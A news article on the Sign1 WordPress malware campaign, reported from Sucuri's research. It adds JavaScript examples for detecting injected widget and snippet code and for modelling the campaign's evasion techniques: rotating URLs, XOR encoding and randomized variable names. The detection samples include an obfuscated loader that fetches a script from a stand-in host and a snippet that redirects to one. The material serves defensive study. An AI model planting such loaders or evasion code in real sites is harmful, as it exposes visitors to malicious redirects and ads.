Major new malware campaign hits thousands of WordPress sites

Hackers have been observed installing a brand new piece of malware on vulnerable WordPress sites.

The malware, called Sign1, redirects visitors to dangerous websites and displays pop-up advertisements that the site owners never intended to show.

The discovery was made earlier this week by cybersecurity researchers at Sucuri, after a customer reported that his website was misbehaving, BleepingComputer reports.

Multiple evasion methods

According to Sucuri’s report, the client’s website was brute-forced: unnamed attackers tried numerous username and password combinations until they found one that worked. Then, instead of modifying the WordPress files (the more common approach in WordPress attacks), the threat actors injected the malware into custom HTML widgets and plugins, or installed the Simple Custom CSS and JS plugin and used it to add the JavaScript code to the site. Because widget and snippet content lives in the database rather than on disk, this placement also sidesteps file-integrity checks.
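A practitioner checking a site for this kind of compromise would want to look in exactly those two storage locations. The following is an added example, not Sucuri’s tooling and not code from the campaign: it runs a heuristic scan over constructed, simplified records standing in for the Custom HTML widget option and the Simple Custom CSS and JS plugin’s snippets. The indicator patterns, their weights, the threshold and the sample records are all assumptions made for illustration, not Sign1 signatures.

```javascript
// Added example, not code from Sucuri or from the Sign1 campaign: a heuristic
// scan of the two places the article says the script was injected, the
// Custom HTML widget option and the Simple Custom CSS and JS plugin's entries.
// The records and the indicator patterns are constructed assumptions.

// Weighted indicators of an injected redirect/ad loader. A bare "^" is NOT an
// indicator (CSS selectors such as a[href^="http"] use it legitimately); the
// XOR pattern requires a charCodeAt()/fromCharCode() operand next to it.
const INDICATORS = [
  { name: "xor-decode",    weight: 2, re: /charCodeAt\s*\([^)]*\)\s*\^|fromCharCode\s*\([^)]*\^/ },
  { name: "time-based",    weight: 1, re: /Date\.now\s*\(\)|new\s+Date\s*\(/ },
  { name: "redirect",      weight: 2, re: /\blocation\s*(?:\.href|\.replace|\.assign)?\s*[=(]/ },
  { name: "popup",         weight: 1, re: /window\.open\s*\(/ },
  { name: "remote-script", weight: 1, re: /\.src\s*=|createElement\s*\(\s*["']script["']\s*\)/ },
];
const THRESHOLD = 3; // assumed: one strong indicator plus one weak one

// Score a single stored record and return the matched indicator names.
function scanEntry(entry) {
  const hits = INDICATORS.filter(ind => ind.re.test(entry.content));
  const score = hits.reduce((sum, ind) => sum + ind.weight, 0);
  return {
    source: entry.source,
    id: entry.id,
    indicators: hits.map(ind => ind.name),
    score,
    verdict: score >= THRESHOLD ? "suspicious" : "clean",
  };
}

function scanEntries(entries) {
  return entries.map(scanEntry);
}

// Constructed, simplified records. On a live site widget_custom_html is a
// PHP-serialized array in wp_options and the plugin's snippets are posts of a
// custom post type; here both are reduced to plain objects with the raw content.
const SAMPLE_ENTRIES = [
  { source: "wp_options:widget_custom_html", id: "custom_html-2",
    content: '<p>Follow us on social media.</p>\n<script async src="https://analytics.example.com/tag.js"></script>' },
  { source: "wp_options:widget_custom_html", id: "custom_html-3",
    content: '<script>var _0xq7e="whw)mt";var _k1j=7;var _u9=_0xq7e.split("").map(function(c){return String.fromCharCode(c.charCodeAt(0)^_k1j);}).join("");var _s=document.createElement("script");_s.src="https://cdn.example.invalid/"+Math.floor(Date.now()/600000)+"/"+_u9;document.head.appendChild(_s);</script>' },
  { source: "wp_posts:custom-css-js", id: 41,
    content: 'document.querySelectorAll(\'a[href^="http"]\').forEach(function(a){a.setAttribute("target","_blank");});' },
  { source: "wp_posts:custom-css-js", id: 57,
    content: 'window.setTimeout(function(){window.location.href="https://go.example.invalid/"+Math.floor(new Date().getTime()/600000);},1500);' },
];

// Print one line per record: verdict, location, matched indicators, score.
for (const r of scanEntries(SAMPLE_ENTRIES)) {
  console.log(`${r.verdict.padEnd(10)} ${r.source} ${r.id} [${r.indicators.join(", ")}] score=${r.score}`);
}
```

The two constructed malicious records are flagged (the widget for XOR decoding plus a time-derived script URL, the snippet for a time-derived redirect), while the analytics tag and the link-target snippet, which contains a CSS `^=` selector, stay clean. On a real site the same scan would be fed the deserialized `widget_custom_html` option and the plugin’s post content.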

Further investigation revealed that more than 39,000 websites were infected with the same malware. Sucuri is not sure how the other websites were compromised, but suspects a combination of brute force and the exploitation of vulnerabilities in various plugins and themes.

Sign1 also uses several methods to avoid being noticed.

For starters, it uses time-based randomization, generating dynamic URLs that change every 10 minutes. This keeps the URLs the malware loads from constantly fresh, so that a block list built from earlier observations is already stale by the time it is deployed.

Second, the domains are hosted on HETZNER and Cloudflare, which obscures both the hosting provider and the real IP addresses. Finally, the injected code is XOR-encoded and uses randomized variable names, which defeats simple signature matching and makes detection even more difficult.
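To make those evasion techniques concrete, here is an added example (not Sign1’s code) that models time-based URL rotation and single-byte XOR encoding and shows the analyst-side reversal of each. It goes one step beyond the text on randomized variable names: renaming every declared identifier to a canonical form makes two differently-named copies of a payload identical again, so a signature can be written on the normalized form. The domain, the XOR key, and the payload snippets are constructed assumptions.

```javascript
// Added example, not Sign1's code: working models of the evasion techniques
// described in the article, plus the analyst-side reversal of each. The domain,
// the XOR key and the sample payloads are constructed assumptions.

const BUCKET_MS = 10 * 60 * 1000; // "URLs change every 10 minutes"

// Time-based URL rotation: the path is derived from the current 10-minute
// window, so every visitor in the same window fetches the same URL, while a
// block list entry for that URL is stale as soon as the window ends.
function rotatingUrl(nowMs, base = "https://cdn.example.invalid/") {
  const bucket = Math.floor(nowMs / BUCKET_MS);
  return `${base}${bucket.toString(36)}.js`;
}

// How many distinct URLs a URL-based block list would have to track per day
// (sampled once a minute across a 24-hour span).
function distinctUrlsPerDay(base) {
  const seen = new Set();
  for (let t = 0; t < 24 * 60 * 60 * 1000; t += 60 * 1000) seen.add(rotatingUrl(t, base));
  return seen.size;
}

// Single-byte XOR "encoding": applying it twice with the same key restores the
// text, so one function both hides a string in the payload and recovers it
// during analysis.
function xorString(str, key) {
  let out = "";
  for (let i = 0; i < str.length; i++) out += String.fromCharCode(str.charCodeAt(i) ^ key);
  return out;
}

// Randomized identifiers defeat hash/exact-match signatures. Renaming every
// var/let/const-declared identifier to v0, v1, ... in order of first
// declaration makes differently-named copies of one payload identical again.
function normalizeIdentifiers(code) {
  const declared = [...code.matchAll(/\b(?:var|let|const)\s+([A-Za-z_$][\w$]*)/g)].map(m => m[1]);
  const names = [...new Set(declared)];
  if (names.length === 0) return code;
  const canonical = new Map(names.map((n, i) => [n, `v${i}`]));
  const escape = s => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(`(?<![\\w$])(?:${names.map(escape).join("|")})(?![\\w$])`, "g");
  return code.replace(re, m => canonical.get(m));
}

// Two constructed copies of one payload that differ only in identifier names,
// as a variable-renaming obfuscator would emit them. "whw)mt" is "pop.js"
// XOR-encoded with key 7.
const VARIANT_A = 'var _0xq7e="whw)mt";var _k1j=7;var _u9=_0xq7e.split("").map(function(c){return String.fromCharCode(c.charCodeAt(0)^_k1j);}).join("");';
const VARIANT_B = 'var zq9Lx="whw)mt";var Qwe_1=7;var hhT=zq9Lx.split("").map(function(c){return String.fromCharCode(c.charCodeAt(0)^Qwe_1);}).join("");';

const now = Date.now();
console.log("URL this window:       ", rotatingUrl(now));
console.log("URL next window:       ", rotatingUrl(now + BUCKET_MS));
console.log("distinct URLs per day: ", distinctUrlsPerDay());
console.log("decoded literal:       ", xorString("whw)mt", 7));
console.log("same after normalizing:", normalizeIdentifiers(VARIANT_A) === normalizeIdentifiers(VARIANT_B));
```

The takeaway for detection is in the last two lines: the XOR layer is trivially reversible once the key is read out of the payload, and the randomized names collapse to a stable form, so a signature on the decoded, normalized code survives the per-infection variation that defeats a signature on the raw bytes. The rotating URL is the harder problem, which is why Sucuri’s recommendations focus on the site, not on blocking the domains.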

The campaign has been running for about six months, the researchers concluded, and the malware is in active development: each new version released by its developers has been followed by a rise in infections.

The latest wave began in January 2024 and has compromised approximately 2,500 websites to date.

To stay safe, the researchers advise site owners to use strong, unique passwords that cannot be brute-forced, and to remove any unused or unnecessary plugins and themes, since these can give attackers an entry point into the site.
